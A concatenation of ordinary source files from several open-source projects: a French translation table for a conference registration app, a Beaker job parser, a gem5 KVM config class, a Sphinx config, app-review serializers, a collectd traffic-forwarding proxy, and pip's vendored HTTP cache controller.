'Sure you want to delete this object?': 'Voulez-vous vraiment supprimer cet objet?',
't-shirt': 't-shirt',
'T-shirt Size': 'Grandeur du tee-shirt',
't-shirt, catering and other extra goodies': 't-shirt, catering and other extra goodies',
't-shirt, catering, closing party, pro listing (micro-sponsor: logo in badge and web site), and other extra goodies': 't-shirt, catering, closing party, pro listing (micro-sponsor: logo in badge and web site), and other extra goodies',
'Table': 'Table',
'talk': 'talk',
'Talk Info': 'Information à propos de la présentation',
'Talk Proposal': 'Proposition de présentation',
'Talk Proposals': 'Talk Proposals',
'text': 'text',
'Thanks for joining the partakers list': 'Thanks for joining the partakers list',
'The activity %(activity)s received a comment': 'The activity %(activity)s received a comment',
'The activity %(activity)s was confirmed': 'The activity %(activity)s was confirmed',
'The Financial Aid request process is described here:': "Le processus de demande d'aide financière est décrit ici:",
'The map below shows the home location of all attendees who agreed to make their information public.': "La carte ci-dessous montre l'emplacement d'origine de tous les participants qui ont accepté de rendre leur information publique.",
'The payment process has failed.': 'The payment process has failed.',
'There are errors in your form below': 'Il y a des erreurs dans votre formulaire ci-dessous',
'This information will be encoded on your badge and can be provided to sponsors and exhibitors in the expo hall. These fields are optional unless otherwise noted. Mailing address information is required to send receipts for PSF donations.': "Ces informations seront écrites sur votre porte-nom et peuvent être fournies aux commanditaires et aux exposants dans le hall d'expo. Ces champs sont facultatifs, sauf avec indication contraire. Votre adresse de correspondance est nécessaire pour recevoir un reçu de don au PSF. :",
'this invoice': 'cette facture',
'Time': 'Time',
'Time extension': 'Time extension',
'Time left': 'Time left',
'Time to Pay!': "C'est le temps de payer!",
'Timeline': 'Timeline',
'Timetable': 'Timetable',
'TIP: To change the sort order of the tables, click over the column headers': 'TIP: To change the sort order of the tables, click over the column headers',
'Title': 'Title',
'To': 'À',
'to your payment': 'votre paiement',
'Toggle Editor': 'Toggle Editor',
'Total Amount Billed': 'Montant facturé',
'Total Amount Received': 'Montant reçu',
'Total Amount Still Due': 'Montant dû',
'Track': 'Track',
'Transfer cancelled': 'Transfert annulé',
'Transfers Balance From': 'Formulaire de transfert du solde de compte',
'Traveling': 'Traveling',
'Tutorial': 'Tutorial',
'tutorial': 'tutorial',
'Tutorials': 'Leçons',
'Tutorials Only (early), $80': 'Leçons seulement (tôt), 80 $',
'Tutorials Only (on site), $120': 'Leçons seulement (sur le site), 120 $',
'Tutorials Only (regular), $100': 'Leçons seulement (régulier), 100 $',
'Tutorials+food': 'Tutorials+food',
'Tweet feature disabled (user not logged in)': 'Tweet feature disabled (user not logged in)',
'Twitter username': 'Twitter username',
'Type': 'Type',
'Type in the box the tokens of the people you want to pay the balance from. You can insert multiple tokens separated by a comma. They can find their tokens on the [PAY NOW] page.': 'Vous pouvez payer le solde de compte des autres en tapant leur numéro de jeton de paiement dans le champ qui suit. Vous pouvez insérer plusieurs jetons à la fois en les séparant par une virgule. Les participants pour lesquels vous payez peuvent trouver leurs jetons de paiement sur la page de paiement nommé <<PAYEZ MAINTENANT>>. :',
'Type of notification': 'Type of notification',
'Type of operation': 'Type of operation',
'Unable to download because:': 'Unable to download because:',
'Unable to download tweets:': 'Unable to download tweets:',
'unable to parse csv file': "impossible d'analyser le fichier CSV",
'unable to retrieve data': 'impossible de récupérer les données',
'Unconfirmed activities are shown shaded until author confirm scheduled date, time and room.': 'Unconfirmed activities are shown shaded until author confirm scheduled date, time and room.',
'Unconfirmed activities are shown shaded until author confirms scheduled date, time and room.': 'Unconfirmed activities are shown shaded until author confirms scheduled date, time and room.',
'Unsure': 'Incertain',
'Update my project application': 'Update my project application',
'Update Record': 'Mettre à jour ce dossier',
'Update result': 'Update result',
'Update this Activity Proposal': 'Update this Activity Proposal',
'Update this Talk Proposal': 'Mettre à jour cette proposition de présentation',
'Updated %s operations': 'Updated %s operations',
'Upload': 'Upload',
'USD': 'USD',
'user': 'user',
'User': 'User',
'User %(created_signature)s on %(created_on)s says: %(body)s': 'User %(created_signature)s on %(created_on)s says: %(body)s',
'User Votes': 'User Votes',
'Username': 'Username',
'Value': 'Value',
'Value or record reference': 'Value or record reference',
'vegan': 'végétalien(ne) intégral(e)',
'vegetarian': 'végétarien(ne)',
'Venue': 'Venue',
'Video': 'Video',
'View': 'View',
'Viewing page version: %s': 'Viewing page version: %s',
'Volunteer': 'Volunteer',
'Voting': 'Voting',
'Voting is disabled': 'Voting is disabled',
'Voting is not allowed yet': 'Voting is not allowed yet',
'Voto Aceptado!': 'Voto Aceptado!',
'Warning': 'Warning',
'web2conf': 'web2conf',
'Welcome to PyCon': 'Bienvenue à PyCon',
"Whats's included?": "Whats's included?",
'WIKI format: ': 'WIKI format: ',
"women's/large": 'pour femme/large',
"women's/medium": 'pour femme/moyen',
"women's/small": 'pour femme/petit',
'Workshop': 'Workshop',
'workshop': 'workshop',
"Write a comment for the project's owner": "Write a comment for the project's owner",
'xlarge': 'xlarge',
'xxlarge': 'xxlarge',
'xxxlarge': 'xxxlarge',
'Yes. Give them your "payment token":': 'Oui. Donnez-leur votre <<jeton de paiement>> :',
'You can only choose one tutorial per each session': 'You can only choose one tutorial per each session',
'You can only choose tutorial per each session': 'Vous pouvez seulement choisir une leçon par session :',
'You can pay register somebody else here and transfer their balance. Make sure the email address is correct or they will be unable to change tutorials of update profile. You can register multiple attendees one at the time.': "Vous pouvez payer pour inscrire quelqu'un d'autre ici et transférer leur solde de compte. Assurez-vous que leur adresse de courriel est correcte ou ils ne seront pas capables de mettre à jour leur choix de leçons et leur profil personnel. Vous pouvez inscrire plusieurs participants, un à la fois. :",
'You can pay somebody else\'s conference fees by transferring their balance. The transfer is pending until you pay your conference fees. To transfer the balance type below the "payment token" for the registrants, separated by a comma': "Vous pouvez payer les frais de conférence des autres en transférant leur solde de compte. Le transfert sera en attente jusqu'à ce que vous payiez vos frais d'inscription. Pour transférer les soldes, veuillez taper ci-après le numéro de <<jeton de paiement>> pour chacune des personnes. Les numéros devraient être séparés par des virgules :",
'You can register somebody else here and transfer their balance. Be sure their email address is correct - it is required to verify registration and to log on. You can register multiple attendees one at the time.': "Vous pouvez inscrire quelqu'un d'autre ici et transférer leur solde de compte. Assurez-vous que leur adresse de courriel soit correcte. L'adresse est nécessaire pour vérifier l'enregistrement et pour ouvrir une session. Vous pouvez inscrire plusieurs participants, un à la fois. :",
'You can tweet here': 'You can tweet here',
'You can use markmin syntax here': 'You can use markmin syntax here',
'You dismissed the project': 'You dismissed the project',
'You have %s payments generated, click here to see the status': 'You have %s payments generated, click here to see the status',
'You have a credit of': 'Vous avez un crédit de',
'You have not paid for your registration; the cost is': "Vous n'avez pas payé votre inscription, le coût est :",
'You have successfully finished the payment process. Thanks you.': 'You have successfully finished the payment process. Thanks you.',
'You joined': 'You joined',
'Your Activities': 'Your Activities',
'Your activity %(activity)s has been confirmed.\nYou can access the current activity information at %(link)s': 'Your activity %(activity)s has been confirmed.\nYou can access the current activity information at %(link)s',
'Your activity %(activity)s received a comment by %(user)s:\n%(comment)s\n': 'Your activity %(activity)s received a comment by %(user)s:\n%(comment)s\n',
'Your activity proposal %(activity)s has been recorded.\nYou can access the current activity information at %(link)s\nThank you': 'Your activity proposal %(activity)s has been recorded.\nYou can access the current activity information at %(link)s\nThank you',
'Your balance will be updated when the check is received and cashed.': 'Votre solde sera mis à jour lorsque le chèque sera reçu et encaissé.',
'Your conference fees': "Vos frais d'inscription",
'Your current balance': 'Votre solde de compte',
"Your current granted permisions doesn't not give access to the requested resource": "Your current granted permisions doesn't not give access to the requested resource",
'Your donation': 'Votre don',
'Your new password is %(password)s': 'Your new password is %(password)s',
'Your payment has been generated!': 'Your payment has been generated!',
'Your payment is being processed... (read below)': 'Votre paiement est en cours de traitement... (lire ci-dessous) :',
'Your picture (100px)': 'Your picture (100px)',
'Your picture (for authors)': 'Your picture (for authors)',
'Your picture 100px': 'Your picture 100px',
"Your project's info was updated": "Your project's info was updated",
'Your request could not be processed due to maintenance issues': 'Your request could not be processed due to maintenance issues',
'Your Talks': 'Your Talks',
'Zip/Postal Code': 'Code postal',
}
|
omaciel/automation-tools | refs/heads/master | automation_tools/beaker.py | 12 | """Tools to work with Beaker (https://beaker-project.org/).
The ``bkr`` command-line utility must be available and configured. (Available
via the ``beaker-client`` package on Fedora.) See the `Installing and
configuring the client`_ section of the Beaker documentation.
.. _Installing and configuring the client:
https://beaker-project.org/docs/user-guide/bkr-client.html#installing-and-configuring-the-client
"""
import pprint
import subprocess
import xml.dom.minidom
def main():
"""Run :func:`beaker_jobid_to_system_info` and print the response."""
pprint.pprint(beaker_jobid_to_system_info(open('a.xml')))
def _beaker_process_recipe(recipe):
"""Process recipe and return info about it
:param recipe: recipe (or guestrecipe) element to process
"""
recipe_info = {}
res_task = False
res_tag = False
recipe_info['id'] = int(recipe.attributes['id'].value)
recipe_info['system'] = recipe.attributes['system'].value
recipe_info['arch'] = recipe.attributes['arch'].value
recipe_info['distro'] = recipe.attributes['distro'].value
recipe_info['variant'] = recipe.attributes['variant'].value
# Do we have /distribution/reservesys? If so, status is based on that.
tasks = recipe.getElementsByTagName('task')
for task in reversed(tasks):
if task.attributes['name'].value == '/distribution/reservesys':
res_task = True
res_task_element = task
break
# Do we have <reservesys>? If so, status is recipe.status.
reservesyss = recipe.getElementsByTagName('reservesys')
for _ in reservesyss:
res_tag = True
break
# Determine status of the recipe/system reservation
if res_tag and not res_task:
recipe_info['reservation'] = recipe.attributes['status'].value
elif res_task and not res_tag:
recipe_info['reservation'] = \
res_task_element.attributes['status'].value
elif res_task and res_tag:
recipe_info['reservation'] = (
            'ERROR: Looks like the recipe for this system has too many '
            'methods to reserve it; the outcome is undefined.'
)
else:
recipe_info['reservation'] = recipe.attributes['status'].value
return recipe_info
def beaker_jobid_to_system_info(job_id):
"""Get system reservation task status (plus other info) based on
Beaker ``job_id``.
    This function requires a configured bkr utility. We parse everything from
``bkr job-results [--prettyxml] J:123456``, so if you see some breakage,
please capture that output.
    For testing purposes, if you provide a file descriptor instead of ``job_id``,
XML will be loaded from there.
:param job_id: The ID of a Beaker job. For example: 'J:123456'
"""
systems = []
# Get XML with job results and create DOM object
if hasattr(job_id, 'read'):
dom = xml.dom.minidom.parse(job_id)
else:
out = subprocess.check_output(['bkr', 'job-results', job_id])
dom = xml.dom.minidom.parseString(out)
    # Parse the DOM object. The XML has a structure like this (all elements
# except '<job>' can appear more times):
# <job id='123' ...
# <recipeSet id='456' ...
# <recipe id='789' system='some.system.example.com'
# status='Reserved' ...
# <recipe id='790' system='another.system.example.com'
# status='Completed' ...
# <guestrecipe id='147258' ...
# </recipeSet>
# <recipeSet id='457' ...
# ...
jobs = dom.getElementsByTagName('job')
for job in jobs:
recipe_sets = job.getElementsByTagName('recipeSet')
for recipe_set in recipe_sets:
recipes = recipe_set.getElementsByTagName('recipe')
for recipe in recipes:
systems.append(_beaker_process_recipe(recipe))
guestrecipes = recipe.getElementsByTagName('guestrecipe')
for guestrecipe in guestrecipes:
systems.append(_beaker_process_recipe(guestrecipe))
return systems
if __name__ == '__main__':
main()
|
rjschof/gem5 | refs/heads/master | src/cpu/kvm/KvmVM.py | 57 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.params import *
from m5.proxy import *
from m5.SimObject import SimObject
class KvmVM(SimObject):
type = 'KvmVM'
cxx_header = "cpu/kvm/vm.hh"
system = Param.System(Parent.any, "system object")
coalescedMMIO = VectorParam.AddrRange([], "memory ranges for coalesced MMIO")
|
artmusic0/theano-learning.part02 | refs/heads/master | fixed_official_convolutional_vv1(self_mnist)/doc/conf.py | 35 | # -*- coding: utf-8 -*-
#
# theano documentation build configuration file, created by
# sphinx-quickstart on Tue Oct 7 16:34:06 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo']
try:
from sphinx.ext import pngmath
extensions.append('sphinx.ext.pngmath')
except ImportError:
print >>sys.stderr, 'Warning: could not import sphinx.ext.pngmath'
pass
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'DeepLearning'
copyright = '2008--2010, LISA lab'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_dirs = ['scripts']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'default.css'
html_theme = 'sphinxdoc'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['.static', 'images']
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'deeplearningdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
latex_font_size = '11pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'deeplearning.tex', 'Deep Learning Tutorial',
'LISA lab, University of Montreal', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
default_role = 'math'
pngmath_divpng_args = ['-gamma 1.5','-D 110']
pngmath_latex_preamble = '\\usepackage{amsmath}\n'+\
'\\usepackage{amsfonts}\n'+\
'\\usepackage{amssymb}\n'+\
'\\def\\E{\\mathbf{E}}\n'+\
'\\def\\F{\\mathbf{F}}\n'+\
'\\def\\x{\\mathbf{x}}\n'+\
'\\def\\h{\\mathbf{h}}\n'+\
'\\def\\v{\\mathbf{v}}\n'+\
'\\def\\nv{\\mathbf{v^{{\bf -}}}}\n'+\
'\\def\\nh{\\mathbf{h^{{\bf -}}}}\n'+\
'\\def\\s{\\mathbf{s}}\n'+\
'\\def\\b{\\mathbf{b}}\n'+\
'\\def\\c{\\mathbf{c}}\n'+\
'\\def\\W{\\mathbf{W}}\n'+\
'\\def\\C{\\mathbf{C}}\n'+\
'\\def\\P{\\mathbf{P}}\n'+\
'\\def\\T{{\\bf \\mathcal T}}\n'+\
'\\def\\B{{\\bf \\mathcal B}}\n'
|
tsl143/zamboni | refs/heads/master | mkt/reviewers/serializers.py | 13 | from rest_framework import serializers
from mkt.api.fields import TranslationSerializerField
from mkt.reviewers.models import (AdditionalReview, CannedResponse,
QUEUE_TARAKO, ReviewerScore)
from mkt.webapps.models import Webapp
from mkt.webapps.serializers import ESAppSerializer
class ReviewingSerializer(serializers.ModelSerializer):
class Meta:
model = Webapp
fields = ('resource_uri', )
resource_uri = serializers.HyperlinkedRelatedField(view_name='app-detail',
read_only=True,
source='*')
SEARCH_FIELDS = [u'device_types', u'id', u'is_escalated', u'is_packaged',
u'name', u'premium_type', u'price', u'slug', u'status']
class ReviewersESAppSerializer(ESAppSerializer):
latest_version = serializers.SerializerMethodField('get_latest_version')
is_escalated = serializers.BooleanField()
class Meta(ESAppSerializer.Meta):
fields = SEARCH_FIELDS + ['latest_version', 'is_escalated']
def get_latest_version(self, obj):
v = obj.es_data.latest_version
return {
'has_editor_comment': v.has_editor_comment,
'has_info_request': v.has_info_request,
'is_privileged': v.is_privileged,
'status': v.status,
}
class AdditionalReviewSerializer(serializers.ModelSerializer):
"""Developer facing AdditionalReview serializer."""
app = serializers.PrimaryKeyRelatedField()
comment = serializers.CharField(max_length=255, read_only=True)
class Meta:
model = AdditionalReview
fields = ['id', 'app', 'queue', 'passed', 'created', 'modified',
'review_completed', 'comment']
# Everything is read-only.
read_only_fields = ['id', 'passed', 'created', 'modified',
'review_completed', 'reviewer']
def pending_review_exists(self, queue, app_id):
return (AdditionalReview.objects.unreviewed(queue=queue)
.filter(app_id=app_id)
.exists())
def validate_queue(self, attrs, source):
if attrs[source] != QUEUE_TARAKO:
raise serializers.ValidationError('is not a valid choice')
return attrs
def validate_app(self, attrs, source):
queue = attrs.get('queue')
app = attrs.get('app')
if queue and app and self.pending_review_exists(queue, app):
raise serializers.ValidationError('has a pending review')
return attrs
class ReviewerAdditionalReviewSerializer(AdditionalReviewSerializer):
"""Reviewer facing AdditionalReview serializer."""
comment = serializers.CharField(max_length=255, required=False)
class Meta:
model = AdditionalReview
fields = AdditionalReviewSerializer.Meta.fields
read_only_fields = list(
set(AdditionalReviewSerializer.Meta.read_only_fields) -
set(['passed', 'reviewer']))
def validate(self, attrs):
if self.object.passed is not None:
raise serializers.ValidationError('has already been reviewed')
elif attrs.get('passed') not in (True, False):
raise serializers.ValidationError('passed must be a boolean value')
else:
return attrs
class CannedResponseSerializer(serializers.ModelSerializer):
name = TranslationSerializerField(required=True)
response = TranslationSerializerField(required=True)
class Meta:
model = CannedResponse
class ReviewerScoreSerializer(serializers.ModelSerializer):
class Meta:
model = ReviewerScore
fields = ['id', 'note', 'user', 'score']
def validate_note(self, attrs, source):
# If note is absent but DRF tries to validate it (because we're dealing
# with a PUT or POST), then add a blank one.
if source not in attrs:
attrs[source] = ''
return attrs
|
mirchr/collectd | refs/heads/master | contrib/network-proxy.py | 105 | #!/usr/bin/env python
# vim: sts=4 sw=4 et
# Simple unicast proxy to send collectd traffic to another host/port.
# Copyright (C) 2007 Pavel Shramov <shramov at mexmat.net>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; only version 2 of the License is applicable.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59 Temple
# Place, Suite 330, Boston, MA 02111-1307 USA
"""
Simple unicast proxy for collectd (>= 4.0).
Binds to 'local' address and forwards all traffic to 'remote'.
"""
import socket
import struct
""" Local multicast group/port"""
local = ("239.192.74.66", 25826)
""" Address to send packets """
remote = ("grid.pp.ru", 35826)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
mreq = struct.pack("4sl", socket.inet_aton(local[0]), socket.INADDR_ANY)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.bind(local)
out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if __name__ == "__main__":
while True:
(buf, addr) = sock.recvfrom(2048)
sock.sendto(buf, remote)
|
mdworks2016/work_development | refs/heads/master | Python/20_Third_Certification/venv/lib/python3.7/site-packages/pip/_vendor/cachecontrol/controller.py | 28 | """
The httplib2 algorithms ported for use with requests.
"""
import logging
import re
import calendar
import time
from email.utils import parsedate_tz
from pip._vendor.requests.structures import CaseInsensitiveDict
from .cache import DictCache
from .serialize import Serializer
logger = logging.getLogger(__name__)
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")
def parse_uri(uri):
"""Parses a URI using the regex given in Appendix B of RFC 3986.
(scheme, authority, path, query, fragment) = parse_uri(uri)
"""
groups = URI.match(uri).groups()
return (groups[1], groups[3], groups[4], groups[6], groups[8])
class CacheController(object):
"""An interface to see if request should cached or not.
"""
def __init__(
self, cache=None, cache_etags=True, serializer=None, status_codes=None
):
self.cache = DictCache() if cache is None else cache
self.cache_etags = cache_etags
self.serializer = serializer or Serializer()
self.cacheable_status_codes = status_codes or (200, 203, 300, 301)
@classmethod
def _urlnorm(cls, uri):
"""Normalize the URL to create a safe key for the cache"""
(scheme, authority, path, query, fragment) = parse_uri(uri)
if not scheme or not authority:
raise Exception("Only absolute URIs are allowed. uri = %s" % uri)
scheme = scheme.lower()
authority = authority.lower()
if not path:
path = "/"
# Could do syntax based normalization of the URI before
# computing the digest. See Section 6.2.2 of Std 66.
request_uri = query and "?".join([path, query]) or path
defrag_uri = scheme + "://" + authority + request_uri
return defrag_uri
@classmethod
def cache_url(cls, uri):
return cls._urlnorm(uri)
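The point of `_urlnorm` is that two URIs differing only in scheme/host case, a missing path, or a fragment map to the same cache key. A standalone sketch of the normalization, reusing the module-level regex from above:

```python
import re

URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")

def urlnorm(uri):
    # Mirrors CacheController._urlnorm: lowercase scheme and host, default
    # the path to "/", keep the query, and drop the fragment.
    groups = URI.match(uri).groups()
    scheme, authority, path, query = groups[1], groups[3], groups[4], groups[6]
    if not scheme or not authority:
        raise Exception("Only absolute URIs are allowed. uri = %s" % uri)
    path = path or "/"
    request_uri = "?".join([path, query]) if query else path
    return scheme.lower() + "://" + authority.lower() + request_uri

print(urlnorm("HTTP://Example.COM/a?b=1#frag"))  # http://example.com/a?b=1
```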
def parse_cache_control(self, headers):
known_directives = {
# https://tools.ietf.org/html/rfc7234#section-5.2
"max-age": (int, True),
"max-stale": (int, False),
"min-fresh": (int, True),
"no-cache": (None, False),
"no-store": (None, False),
"no-transform": (None, False),
"only-if-cached": (None, False),
"must-revalidate": (None, False),
"public": (None, False),
"private": (None, False),
"proxy-revalidate": (None, False),
"s-maxage": (int, True),
}
cc_headers = headers.get("cache-control", headers.get("Cache-Control", ""))
retval = {}
for cc_directive in cc_headers.split(","):
if not cc_directive.strip():
continue
parts = cc_directive.split("=", 1)
directive = parts[0].strip()
try:
typ, required = known_directives[directive]
except KeyError:
logger.debug("Ignoring unknown cache-control directive: %s", directive)
continue
if not typ or not required:
retval[directive] = None
if typ:
try:
retval[directive] = typ(parts[1].strip())
except IndexError:
if required:
logger.debug(
"Missing value for cache-control " "directive: %s",
directive,
)
except ValueError:
logger.debug(
"Invalid value for cache-control directive " "%s, must be %s",
directive,
typ.__name__,
)
return retval
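The observable effect of the parser above, reduced to the common cases: valued directives are coerced to `int`, bare directives map to `None`, and unknown directives are dropped. A simplified standalone sketch (it handles only a few directives and skips the required/optional bookkeeping of the full parser):

```python
def parse_cache_control(value, known=("max-age", "no-cache", "no-store", "s-maxage")):
    # Split on commas, keep known directives, coerce "name=value" values to int.
    retval = {}
    for part in value.split(","):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        name = name.strip()
        if name not in known:
            continue  # unknown directives are ignored, as in the full parser
        retval[name] = int(val.strip()) if val else None
    return retval

print(parse_cache_control("max-age=3600, no-cache"))
# {'max-age': 3600, 'no-cache': None}
```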
def cached_request(self, request):
"""
Return a cached response if it exists in the cache, otherwise
return False.
"""
cache_url = self.cache_url(request.url)
logger.debug('Looking up "%s" in the cache', cache_url)
cc = self.parse_cache_control(request.headers)
# Bail out if the request insists on fresh data
if "no-cache" in cc:
logger.debug('Request header has "no-cache", cache bypassed')
return False
if "max-age" in cc and cc["max-age"] == 0:
            logger.debug('Request header has "max-age" as 0, cache bypassed')
return False
# Request allows serving from the cache, let's see if we find something
cache_data = self.cache.get(cache_url)
if cache_data is None:
logger.debug("No cache entry available")
return False
# Check whether it can be deserialized
resp = self.serializer.loads(request, cache_data)
if not resp:
logger.warning("Cache entry deserialization failed, entry ignored")
return False
# If we have a cached 301, return it immediately. We don't
# need to test our response for other headers b/c it is
# intrinsically "cacheable" as it is Permanent.
# See:
# https://tools.ietf.org/html/rfc7231#section-6.4.2
#
# Client can try to refresh the value by repeating the request
# with cache busting headers as usual (ie no-cache).
if resp.status == 301:
msg = (
'Returning cached "301 Moved Permanently" response '
"(ignoring date and etag information)"
)
logger.debug(msg)
return resp
headers = CaseInsensitiveDict(resp.headers)
if not headers or "date" not in headers:
if "etag" not in headers:
# Without date or etag, the cached response can never be used
# and should be deleted.
logger.debug("Purging cached response: no date or etag")
self.cache.delete(cache_url)
logger.debug("Ignoring cached response: no date")
return False
now = time.time()
date = calendar.timegm(parsedate_tz(headers["date"]))
current_age = max(0, now - date)
logger.debug("Current age based on date: %i", current_age)
# TODO: There is an assumption that the result will be a
# urllib3 response object. This may not be best since we
# could probably avoid instantiating or constructing the
# response until we know we need it.
resp_cc = self.parse_cache_control(headers)
# determine freshness
freshness_lifetime = 0
# Check the max-age pragma in the cache control header
if "max-age" in resp_cc:
freshness_lifetime = resp_cc["max-age"]
logger.debug("Freshness lifetime from max-age: %i", freshness_lifetime)
# If there isn't a max-age, check for an expires header
elif "expires" in headers:
expires = parsedate_tz(headers["expires"])
if expires is not None:
expire_time = calendar.timegm(expires) - date
freshness_lifetime = max(0, expire_time)
logger.debug("Freshness lifetime from expires: %i", freshness_lifetime)
# Determine if we are setting freshness limit in the
# request. Note, this overrides what was in the response.
if "max-age" in cc:
freshness_lifetime = cc["max-age"]
logger.debug(
"Freshness lifetime from request max-age: %i", freshness_lifetime
)
if "min-fresh" in cc:
min_fresh = cc["min-fresh"]
# adjust our current age by our min fresh
current_age += min_fresh
logger.debug("Adjusted current age from min-fresh: %i", current_age)
# Return entry if it is fresh enough
if freshness_lifetime > current_age:
logger.debug('The response is "fresh", returning cached response')
logger.debug("%i > %i", freshness_lifetime, current_age)
return resp
# we're not fresh. If we don't have an Etag, clear it out
if "etag" not in headers:
logger.debug('The cached response is "stale" with no etag, purging')
self.cache.delete(cache_url)
# return the original handler
return False
